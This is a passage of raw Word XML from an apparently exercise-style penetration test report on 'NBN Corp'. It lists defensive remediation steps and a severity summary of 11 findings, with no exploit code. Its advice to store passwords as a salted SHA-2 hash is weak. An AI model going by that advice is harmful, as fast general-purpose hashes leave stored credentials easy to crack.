        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D93DFA">
        <w:t>Implement Multifactor authentication such as SMS-verification, email code, or push notification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243BB798" w14:textId="77777777" w:rsidR="00714CFE" w:rsidRPr="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19197D8E" w14:textId="181C47A7" w:rsidR="00714CFE" w:rsidRPr="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F52E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A89C4BB" w14:textId="3C3E4F26" w:rsidR="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00714CFE">
        <w:t>In the Apache Configuration file, commonly named “httpd.conf,” search for the &lt;Directory&gt; directive that corresponds to the directory that you want to disable browsing. To disable the directory from being browsed, look for the like that contains the option directive and remove the indexes option. This can be done by putting a minus sign before the Indexes</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934ED71" w14:textId="77777777" w:rsidR="00EC7A7A" w:rsidRDefault="00EC7A7A" w:rsidP="00EC7A7A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67063ED3" w14:textId="1DE8ABEF" w:rsidR="00EC7A7A" w:rsidRPr="00714CFE" w:rsidRDefault="00EC7A7A" w:rsidP="00EC7A7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A511AC" w14:textId="16DC4020" w:rsidR="00EC7A7A" w:rsidRDefault="00EC7A7A" w:rsidP="00EC7A7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitize user input and place permissions on sensitive files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23B5E8" w14:textId="77777777" w:rsidR="00EC7A7A" w:rsidRDefault="00EC7A7A" w:rsidP="00EC7A7A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD726F5" w14:textId="77777777" w:rsidR="00F52E62" w:rsidRPr="00714CFE" w:rsidRDefault="00F52E62" w:rsidP="00F52E62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E8CC03" w14:textId="56B94286" w:rsidR="00F52E62" w:rsidRDefault="00F52E62" w:rsidP="00F52E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC7A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E76EFF" w14:textId="77777777" w:rsidR="00F52E62" w:rsidRDefault="00F52E62" w:rsidP="00F52E62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not use GET request for login. Use POST request instead </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25713C29" w14:textId="77777777" w:rsidR="00291C36" w:rsidRDefault="00291C36" w:rsidP="00291C36">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345B917A" w14:textId="77777777" w:rsidR="00F52E62" w:rsidRPr="00291C36" w:rsidRDefault="00F52E62" w:rsidP="00291C36">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEED2E0" w14:textId="746EE9ED" w:rsidR="00291C36" w:rsidRDefault="00291C36" w:rsidP="00291C36">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC7A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Shown SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458211FE" w14:textId="3C8020B5" w:rsidR="00714CFE" w:rsidRPr="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not show the SQL query as an error message. Instead, have the error message say Invalid login. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEF1003" w14:textId="77777777" w:rsidR="00714CFE" w:rsidRPr="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781CBAFB" w14:textId="5FE1C77C" w:rsidR="00291C36" w:rsidRPr="00291C36" w:rsidRDefault="00291C36" w:rsidP="00291C36">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC7A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00714CFE" w:rsidRPr="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure Cryptographic Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252034E" w14:textId="32C496DC" w:rsidR="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Use Sha – 2 family of hashes (SHA -256, SHA-384, SHA-512) instead of MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE1431B" w14:textId="6FE7FE62" w:rsidR="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Use a salt for the passwords and usernames stored in the database. This can be done by generating a unique random sequence of characters (between 16- 32 bytes long). Then concatenate the password and the salt together and hash them into the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DE2F3" w14:textId="77777777" w:rsidR="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34ED6658" w14:textId="4047D835" w:rsidR="00714CFE" w:rsidRPr="00714CFE" w:rsidRDefault="00714CFE" w:rsidP="00714CFE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EC7A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E26B3" w14:textId="19690493" w:rsidR="00291C36" w:rsidRDefault="00291C36" w:rsidP="00714CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291C36">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Use stronger passwords. It is recommended that the passwords include a combination of upper- and lower-case letters, numbers, and special characters. Ideally, it should be lengthy, unique, and not easily associated with personal information like names or birthdates. Creating a passphrase or using a password manager to generate and store complex passwords can also enhance security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162813B6" w14:textId="77777777" w:rsidR="0022617B" w:rsidRPr="00291C36" w:rsidRDefault="0022617B" w:rsidP="0022617B">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C89362" w14:textId="33335ACC" w:rsidR="0022617B" w:rsidRPr="00714CFE" w:rsidRDefault="0022617B" w:rsidP="0022617B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714CFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EC7A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB098B" w14:textId="43DCF083" w:rsidR="0022617B" w:rsidRPr="00291C36" w:rsidRDefault="0022617B" w:rsidP="0022617B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Place authentication on the staging server. The production server should not be exposed to the public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA08F65" w14:textId="2BCB4569" w:rsidR="0022617B" w:rsidRDefault="00EC7A7A" w:rsidP="00EC7A7A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc153834533"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0022617B">
        <w:t>onclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4CC13429" w14:textId="77777777" w:rsidR="0022617B" w:rsidRPr="00C76750" w:rsidRDefault="0022617B" w:rsidP="0022617B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">NetArmor </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">performed a security assessment of the corporate network of NBN Corp on 12/14/2023. </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">NetArmor’s </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">penetration test simulated an attack from an external threat actor attempting to </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to systems within the NBN Corp corporate network. The purpose of this assessment was to discover and identify vulnerabilities in NBN Corp’s infrastructure and suggest methods to remediate the vulnerabilities. </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>NetArmor tested popular web application vulnerabilities such as SQL injection, Cross Site Scripting, and more. In total,</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 11 vulnerabilities within the scope of the engagement were found and are broken down by severity in the table below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFAD3F9" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:left w:w="100" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:right w:w="100" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2341"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2339"/>
      </w:tblGrid>
      <w:tr w:rsidR="0022617B" w14:paraId="0738707D" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>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980000"/>
          </w:tcPr>
          <w:p w14:paraId="73A2D171" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
          </w:tcPr>
          <w:p w14:paraId="4849E206" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
          </w:tcPr>
          <w:p w14:paraId="5570D153" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="38761D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="641B527D" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022617B" w14:paraId="7BDF3FCF" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>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1B400E2E" w14:textId="7EB9DE84" w:rsidR="0022617B" w:rsidRDefault="00F52E62" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036CB8FB" w14:textId="306C503D" w:rsidR="0022617B" w:rsidRDefault="00F52E62" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>5</w:t>
            </w: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14:paraId="7D01267C" w14:textId="61BF08D6" w:rsidR="0022617B" w:rsidRDefault="00F52E62" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="302E50D1" w14:textId="64F9AFC6" w:rsidR="0022617B" w:rsidRDefault="00F52E62" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E9FD8E4" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B"/>
    <w:p w14:paraId="155083DD" w14:textId="02000A56" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The penetration test showed that the nbn web server and the nbn client </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>did not pass our security benchmarks and ha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> a high risk score</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB4D1D">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Our tests show that it is very easy to gain complete administrator control of both the nbn web server as well as the nbn client.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Furthermore, analysis of the vsftpd.log on the nbn client shows that the nbn client was accessed on November 11 by an unauthorized user with the IP address </w:t>
      </w:r>
      <w:r w:rsidRPr="00914447">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>192.168.1.24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
